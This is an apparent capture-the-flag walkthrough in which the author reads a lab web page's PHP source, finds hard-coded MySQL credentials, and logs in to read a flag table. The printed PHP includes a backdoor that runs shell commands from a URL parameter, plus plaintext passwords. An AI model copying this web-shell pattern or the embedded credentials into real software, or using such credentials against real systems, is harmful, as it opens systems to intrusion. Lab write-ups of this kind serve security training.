Contents

Start Page
We’re logging in as architect this time using the flag from the last challenge. Now, I remember a file owned by architect in /var/www… that’s certainly where I’m going to start!

$ cat /var/www/index.php
<?php
if(isset($_GET['cmd'])) {
  $res = shell_exec(urldecode($_GET['cmd']));
  print_r(str_replace("\n", '<br />', $res));
  exit();
}
$info = (object)array();
$info->username = "arch";
$info->password = "asdftgTst5sdf6309sdsdff9lsdftz";
$id = 1003;

function GetList($id, $info) {
        $id = 2;
        $link = mysql_connect("127.0.0.1", $info->username, $info->password);
        mysql_select_db("arch", $link);
        $result = mysql_query("SELECT * FROM arch");
        $output = array();
        while($row = mysql_fetch_assoc($result)) {
                array_push($output, $row);
        }
        var_dump($output);
        return $output;
}

$output = shell_exec('id');
echo "<pre>$output</pre>";

?>
<?php
//ENTER THE RELEVANT INFO BELOW
$mysqlDatabaseName ="arch";
$mysqlUserName ="arch";
$mysqlPassword ="asdftgTst5sdf6309sdsdff9lsdftz";
$mysqlHostName ="127.0.0.1";
$mysqlExportPath ="/var/tmp/ar.sql";

//DO NOT EDIT BELOW THIS LINE
//Export the database and output the status to the page
$command='mysqldump --opt -h' .$mysqlHostName .' -u' .$mysqlUserName .' -p' .$mysqlPassword .' ' .$mysqlDatabaseName .' > ' .$mysqlExportPath;
exec($command,$output=array(),$worked);
switch($worked){
case 0:
echo 'Database <b>' .$mysqlDatabaseName .'</b> successfully exported to <b>~/' .$mysqlExportPath .'</b>';
break;
case 1:
echo 'There was a warning during the export of <b>' .$mysqlDatabaseName .'</b> to <b>~/' .$mysqlExportPath .'</b>';
break;
case 2:
echo 'There was an error during export. Please check your values:<br/><br/><table><tr><td>MySQL Database Name:</td><td><b>' .$mysqlDatabaseName .'</b></td></tr><tr><td>MySQL User Name:</td><td><b>' .$mysqlUserName .'</b></td></tr><tr><td>MySQL Password:</td><td><b>NOTSHOWN</b></td></tr><tr><td>MySQL Host Name:</td><td><b>' .$mysqlHostName .'</b></td></tr></table>';
break;
}
?>



<!DOCTYPE html>
<html>
        <head>
                <title>Architect list query</title>
        </head>
        <body>
                <form action="" method="GET">
                        <input type="text" name="id" />
                        <input type="submit" value="search">
                </form>
                <?php foreach(GetList(1003, $info) as $item):
                        echo $item["id"] . ":" . $item["arch"] . "<br />\r\n";
                endforeach; ?>
        </body>
</html>

Yikes, this architect guy is a pretty piss-poor web developer!
Let’s see if we can login to sql

$ mysql -u arch -p arch
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 43
Server version: 5.7.22-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

Nice! Let’s poke around:

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| arch               |
+--------------------+
2 rows in set (0.00 sec)

mysql> use arch;
Database changed
mysql> show tables;
+----------------+
| Tables_in_arch |
+----------------+
| arch           |
| flag           |
+----------------+
2 rows in set (0.00 sec)

mysql> SELECT * from flag
    -> ;
+---------------------------------------+
| flag                                  |
+---------------------------------------+
| FLAG-xxx |
+---------------------------------------+
1 row in set (0.00 sec)

Damn, that was easy!

Directory
$ cd content && tree